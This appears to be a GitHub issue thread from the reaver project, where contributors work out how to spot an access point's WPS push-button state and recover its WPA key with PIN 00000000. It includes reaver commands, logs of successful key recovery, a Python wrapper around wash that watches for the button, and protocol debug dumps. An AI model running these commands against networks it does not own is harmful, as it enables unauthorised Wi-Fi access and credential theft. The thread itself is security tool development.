When in PBC mode, the Registrar shall respond to PBC M1 messages with UUID-E values matching the UUID-E from the PBC probe request message. The Registrar’s response is an M2 message denoting via the DevicePassword ID attribute that it is in the active PBC state. Upon receiving the M2 message, the Enrollee engages that Registrar with messages M3-M8, with both the Registrar and Enrollee using a value of ‘00000000’ for the PBC Device Password (PIN).
Found it , Found where you got this from
When WPS button was pushed, the AP temporarily change the PIN to 00000000 and change lock flag to unlocked or not, if AP is not vulnerable to Pixie Dust attack then reaver will not work
Any way Which makes us make the conclusion That
is: "wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode, and these routers
Shouldn't happen and i also found this in another WPS documentation titled : Wireless LAN PCI Card User Manual V1.1
Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.
Which means that the only way to actually make sure that the button was pushed is to check Device Password ID value
Images from the first documentation
I have just Tested the OneShot PBC option it works great But it ignores the entered mac address and it doesn't allow specifying a channel
rofl0r
commented
2 years ago meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not. additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
minanagehsalalma
commented
2 years ago meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not.
@rofl0r Just tested it works just Great! , I updated the answer on unix.stackexchange too
additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).
Ohhh , Tested it. This really awesome
But i still can't get it to echo found unless i kill it if i don't use the timeout command
wash -i wlan0mon -j -b XX:XX:B3:XX:7B:XX -c 3 | grep -q "wps_device_password_id" && echo Found || echo NotFound
only prints Found/not found
If i kill it.
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
There is one tiny problem in this, And it's
Even that WPS PBC Still works just fine with the WPS status set to locked, Reaver won't work in that case .... and that would be misleading ... as for Why would it check for the lock when it doesn't matter nor it's needed in WPS PBC case ?
Great work mate
rofl0r
commented
2 years ago But i still can't get it to echo found unless i kill it if i don't use the timeout command
you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.
Even that WPS PBC Still works just find with the WPS status set to locked, Reaver won't work in that case ....
i'd assume the reaver option -L, --ignore-locks Ignore locked state reported by the target AP should make it possible even in that case.
Why would it check for the lock when it doesn't matter nor it's needed in WPS PBC case ?
as i said in the beginning, nobody investigated PBC use case for reaver so far, as the likelihood of somebody pushing the button while you're scanning or running a bruteforce on it seems like winning the lottery.
edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)
minanagehsalalma
commented
2 years ago i'd assume the reaver option
-L, --ignore-locks Ignore locked state reported by the target APshould make it possible even in that case.
@rofl0r But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
-L, --ignore-locks Ignore locked state reported by the target APActually do currently ?oh never mind 😅
you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.
For some reason i can't still figure it out haha, echo not found shouldn't be even be an option
minanagehsalalma
commented
2 years ago edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)
I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on
additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line
It doesn't get affect by the "rssi" right ?
feitoi
commented
2 years ago But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
as i said in the beginning, nobody investigated PBC use case for reaver so far
As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
@minanagehsalalma, when WPS button was pushed, you should use -p 00000000 to get the password and not with -p 12345670
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 0000000
I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on
I think you missed to do WPS authentication while capturing with wireshark.
feitoi
commented
2 years ago But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
Try to reboot your router, after reboot it may be that WPS lock flag goes back to unlocked and then press PBC button
minanagehsalalma
commented
2 years ago @minanagehsalalma, when WPS button was pushed, you should use
-p 00000000to get the password and not with-p 12345670reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 0000000
@feitoi Yeah just tested it, Without the button pushed :
reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000
[+] Switching wlan0mon to channel 3
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
With the button pushed :
reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000
[+] Switching wlan0mon to channel 3
[?] Restore previous session for EX:3X:B3:X0:7B:21? [n/Y] n
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'XXXXXXXXX'
[+] AP SSID: 'AAAAAAAA '
But I still don't understand why it fails when the WPS locked Even when using -L flag and -p 00000000 while the button is pushed ? It should ignore the lock then use that Pin to connect , But why it doesn't do that ?
i'd assume the reaver option
-L, --ignore-locks Ignore locked state reported by the target APshould make it possible even in that case.
@rofl0r As you see i tested it again and it doesn't work.
I think you missed to do WPS authentication while capturing with wireshark.
hmm i didn't think that was needed.
minanagehsalalma
commented
2 years ago As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
@feitoi oh now i get it .... so it still does it the PIN method even when PBC is pushed haha that's funny.
rofl0r
commented
2 years ago that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).
For some reason i can't still figure it out haha, echo not found shouldn't be even be an option
the issue is that wash process keeps running.
here's a wrapper that you can use
import subprocess, sys
argv = list(sys.argv)
argv[0] = '../src/wash'
proc = subprocess.Popen(argv, executable=argv[0], stdout=subprocess.PIPE)
while 1:
line = proc.stdout.readline()
if line == '': break
print line
if '"wps_device_password_id" : "0004"' in line:
print "WPS PBC enabled"
proc.terminate()
breakjust replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap
minanagehsalalma
commented
2 years ago that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK (reason: 0x000F)
[!] WARNING: Detected AP has WPS setup locked!
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
[+] Quitting after 0 crack attempts
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.
Are sure it's not cause Reaver use the Pin method while the router is using PBC ? as feitoi said
reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
just replace ../wash with the path to wash and run it like
python2 washwrap.py -j -f with\ pbc.cap
@rofl0r Huh ? why read or write to a file ? Can't it be done on the live ..... I don't get how to use it .
rofl0r
commented
2 years ago WPS: * Device Password ID (4)
the interesting stuff comes before that.
Are sure it's not cause Reaver use the Pin method while the router is using PBC ?
no, i'm not. i didnt study how PBC works and am of the impression it works identical to pin mode except pin "00000000" needs to be sent. but maybe there's more to it.
just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap@rofl0r Huh ? why read or write to a file ?
what read or write ? this script starts wash as a controlled subprocess and terminates it as soon as the line with the PBC indicator is received.
Can't it be done on the live ..... I don't get how to use it .
save the script as washwrapper.py and run it instead of wash with all arguments you'd usually pass to wash. like python2 washwrapper.py -j -i wlan0mon -c 6. i can't see anything difficult about it. you only got to modify the path to the wash binary instead of "../src/wash"
minanagehsalalma
commented
2 years ago the interesting stuff comes before that.
@rofl0r Here it's
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
30 30 30 30 30 30 30 30 00000000
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00000000"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAA)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address EX:3X:B3:X0:7B:21
WPS: Enrollee Nonce - hexdump(len=16): da 6b f2 5f e4 56 ef 85 ea 45 fb ca 2b ca 06 e2
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
5a 79 78 65 6c TTTT
WPS: Model Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 TTTT-TTTB
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 RT2860
WPS: Serial Number - hexdump_ascii(len=4):
31 32 33 34 1234
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 TTTT-TTTB
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 5c 92 2e 94 3b b5 4a 75 93 0b 28 b8 5e 1b 8b fa
WPS: UUID-R - hexdump(len=16): 79 69 24 bb bd 1d 37 c0 04 70 f6 97 6b e5 e7 41
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
DH: public value - hexdump(len=192): a6 73 a9 61 44 83 32 58 28 78 47 0c 48 c5 00 6d 3c d6 3d ab 22 f1 2f f0 78 9f e3 60 3e 3e 9c 97 d5 ef 06 87 6b 9e 07 09 a5 85 ad 28 fa 2b b8 f3 48 d3 b3 33 a5 54 92 7f c5 88 ae 77 0e 06 a2 1a 87 62 da 61 be f1 22 f1 34 c3 78 96 07 38 7f ad de ed 31 59 c8 2e 7f 80 4d ed 51 2d 3d ef fe 65 04 9a b9 32 13 cd 67 fc 2a 5c c1 4d 30 7b 40 bc 93 69 81 b5 6f 32 30 47 18 17 da 65 bc 8f 01 2a fd ac cf 92 de c1 f5 6b 18 7c bf 61 4c 59 3f 7c 40 a1 c8 e6 dc d1 61 20 4f a9 e4 69 44 eb 27 a2 ed ff 5f a0 75 29 59 c0 bf 7c 6e 10 ea 1c 7a 0f 9e 1b 26 7d 80 e6 f0 3b 6e 3f 1e d1 b8 bb f5 04
WPS: DH Private Key - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
WPS: DH own Public Key - hexdump(len=192): a6 73 a9 61 44 83 32 58 28 78 47 0c 48 c5 00 6d 3c d6 3d ab 22 f1 2f f0 78 9f e3 60 3e 3e 9c 97 d5 ef 06 87 6b 9e 07 09 a5 85 ad 28 fa 2b b8 f3 48 d3 b3 33 a5 54 92 7f c5 88 ae 77 0e 06 a2 1a 87 62 da 61 be f1 22 f1 34 c3 78 96 07 38 7f ad de ed 31 59 c8 2e 7f 80 4d ed 51 2d 3d ef fe 65 04 9a b9 32 13 cd 67 fc 2a 5c c1 4d 30 7b 40 bc 93 69 81 b5 6f 32 30 47 18 17 da 65 bc 8f 01 2a fd ac cf 92 de c1 f5 6b 18 7c bf 61 4c 59 3f 7c 40 a1 c8 e6 dc d1 61 20 4f a9 e4 69 44 eb 27 a2 ed ff 5f a0 75 29 59 c0 bf 7c 6e 10 ea 1c 7a 0f 9e 1b 26 7d 80 e6 f0 3b 6e 3f 1e d1 b8 bb f5 04
WPS: DH Private Key - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
WPS: DH peer Public Key - hexdump(len=192): f7 28 68 51 bc 3c e1 9f 37 ac 32 b3 01 dd 5b 18 db 40 62 4c 3a a3 0b 83 fc 20 15 f5 b4 93 37 e0 6d f4 d8 03 46 8f c4 2a 74 e5 ec 81 a9 ad 09 48 72 3d aa 0a b4 54 73 4f 95 f8 15 35 13 3c b3 e4 fb 37 91 cf 36 11 b9 45 70 0f 2b 67 58 c0 eb f5 86 9d 15 61 a9 96 f1 4a 95 a2 05 e3 fd 06 55 64 57 a8 74 8b fd 76 8e a9 ff 81 b2 ed 13 6f 7f 33 ae 7c 25 86 cf 0e 6c df 17 79 7b 93 0c 46 61 e6 28 83 ad 0b 7c 92 e3 02 cd cb 68 6c 7b 56 f0 df 8e 97 06 05 ea be 53 b1 9d e6 e3 af 84 23 87 9d 12 fe c7 07 de 44 67 bc 72 88 da c8 30 89 19 0b 88 e0 c6 cd bd 53 42 41 38 8f f4 1f eb 3e 48 00
DH: shared key - hexdump(len=192): 3b 14 f9 6e 52 8f b6 f9 2a 47 c4 64 95 2c 2f d6 07 b7 b2 66 bd f8 6d 4f d1 48 9b d2 76 34 e3 46 cf bd fc 4a ae d7 e3 63 6b dd ed 64 58 92 7a 71 95 01 75 77 53 d1 5d cb fb 19 4f 8d 23 dc 8e 11 8b 5c 00 12 d1 26 65 cc 6e 2e 96 f7 3a 0f 36 32 1b db d3 b6 21 2f 80 a7 86 bc cf dc b9 9b aa 19 a0 3a 21 14 ee 5b 72 e7 b5 00 00 00 a7 75 ee 83 3f c2 70 9a 62 0e 0f 8b 76 b8 dc b8 cd 0f 6e 5e 53 28 e5 f1 41 5e 90 65 da 30 0d ff a4 43 92 29 81 91 88 42 ed 75 ed ea 3a 00 37 9e 6f 35 15 9e e9 ae bf 65 d8 13 2a 67 2a 0f 96 b8 46 7e cf c3 3c ef ef 67 ac 68 45 df 8d c8 ee e2 dd 50 6d 9e
WPS: DH shared key - hexdump(len=192): 3b 14 f9 6e 52 8f b6 f9 2a 47 c4 64 95 2c 2f d6 07 b7 b2 66 bd f8 6d 4f d1 48 9b d2 76 34 e3 46 cf bd fc 4a ae d7 e3 63 6b dd ed 64 58 92 7a 71 95 01 75 77 53 d1 5d cb fb 19 4f 8d 23 dc 8e 11 8b 5c 00 12 d1 26 65 cc 6e 2e 96 f7 3a 0f 36 32 1b db d3 b6 21 2f 80 a7 86 bc cf dc b9 9b aa 19 a0 3a 21 14 ee 5b 72 e7 b5 00 00 00 a7 75 ee 83 3f c2 70 9a 62 0e 0f 8b 76 b8 dc b8 cd 0f 6e 5e 53 28 e5 f1 41 5e 90 65 da 30 0d ff a4 43 92 29 81 91 88 42 ed 75 ed ea 3a 00 37 9e 6f 35 15 9e e9 ae bf 65 d8 13 2a 67 2a 0f 96 b8 46 7e cf c3 3c ef ef 67 ac 68 45 df 8d c8 ee e2 dd 50 6d 9e
WPS: DHKey - hexdump(len=32): 6b c3 bb 6b 93 92 fe 02 e1 e7 6b e8 80 90 60 b7 e6 96 f3 51 df 53 e3 73 1c 94 f2 34 18 e2 5c 05
WPS: KDK - hexdump(len=32): fa ab e9 c0 c4 b4 e9 6b 52 1e 04 77 9f bf 45 c6 0f f1 e8 03 18 5f 50 a2 e4 66 f2 ec 9d 5a d2 72
WPS: AuthKey - hexdump(len=32): c9 59 f4 7a 86 dc 97 04 00 77 27 17 07 17 e0 56 85 b2 45 0a 3c 83 2d 00 86 73 a6 cb 3d 1c ce e7
WPS: KeyWrapKey - hexdump(len=16): 8c be 70 f5 39 84 3b 4f fb ba 4f 64 c9 16 2c 9b
WPS: EMSK - hexdump(len=32): 58 c6 9b 76 8b 8e 4d 1a c3 f8 11 00 e6 f4 8b 80 5e 6a 1e d9 41 97 98 ee 06 75 3e 3a 3c 2b b7 fa
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
what read or write ?
i was talking about the pbc.cap and -f you told me to run it with
python2 washwrap.py -j -f with\ pbc.cap
Yeah that worked great , Thanks a lot
python2 washwrapper.py -j -i wlan0mon -c 6.
you only got to modify the path to the wash binary instead of "../src/wash"
but why do i need to type the path ? i just typed wash with no pathes
i also changed the order of these two lines
minanagehsalalma
commented
2 years ago @rofl0r I added the script to the unix.stackexchange answer too
minanagehsalalma
commented
2 years ago Thanks Every one for your Help so far ...
I learned a lot and and figured a lot of things
That wasn't possible with searching
it wasn't possible without you ;)
The only thing missing is Reaver to ignore the AP has WPS setup locked when the WPS button is pushed & to work with -L -p 00000000 pin on PBC
rofl0r
commented
2 years ago @minanagehsalalma if you can provide 2 pcaps:
i can take a look at what would be needed on the reaver side to support it.
minanagehsalalma
commented
2 years ago @rofl0r
ReaverPBCFailing
reaver -i wlan0mon -c 3 -b Mac -vvLN -p 00000000
The output is the same as always
And using router scan with the ignore lock flag
[*] Audit started at 2022.01.26 22:08:44 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.26 22:08:52 (UTC+02:00).i can take a look at what would be needed on the reaver side to support it.
Thanks lot 😘
Also as a bonus can we get a quick view of extracting the values needed for -7, --m7-enc Aka the real title of the issue here and also the title of an earlier issue you posted
guide or tool to get -7 values from pcap
Here the Display Filter Reference: Wifi Protected Setup for wireshark again .. i still don't quite get how to extract them
Edit : Ah never mind , i just noticed that it only works for routers with Realtek RTL819x Chipset so.... and that's a really old one and even if anything uses it .... they have already patched a bug that allowed such attack
rofl0r
commented
2 years ago The output is the same as always
yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.
again .. i still don't quite get how to extract them
there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.
minanagehsalalma
commented
2 years ago yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.
well ... The zip file is right there
I posted the output just incase
@rofl0r so how is it going ?
there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.
I don't think it would be much of a use , as the bug is super old and exists in old devices only and it's already patched .. so ...
minanagehsalalma
commented
2 years ago @rofl0r Look at this We were speaking about a way to go thro the Wpa_cli wps connect in monitor mode
And kcdtv mentioned that you are a member of the forum 😅
So you probably know what's up haha
He told me that wpa_cli wps_pbc is the only available way to do such a thing
So i think Reaver would be the first to provide an alternative
minanagehsalalma
commented
2 years ago @rofl0r any news ?
rofl0r
commented
2 years ago i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.
minanagehsalalma
commented
2 years ago i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.
@rofl0r np , Thanks a lot mate
I am trying to know if it's possible
to know if the WPS button
was pushed on some AP
without trying to connect to it
but with just monitoring it
So i think
sniffing a PBC sessionis what i am looking for , so i would like to know how it worksThanks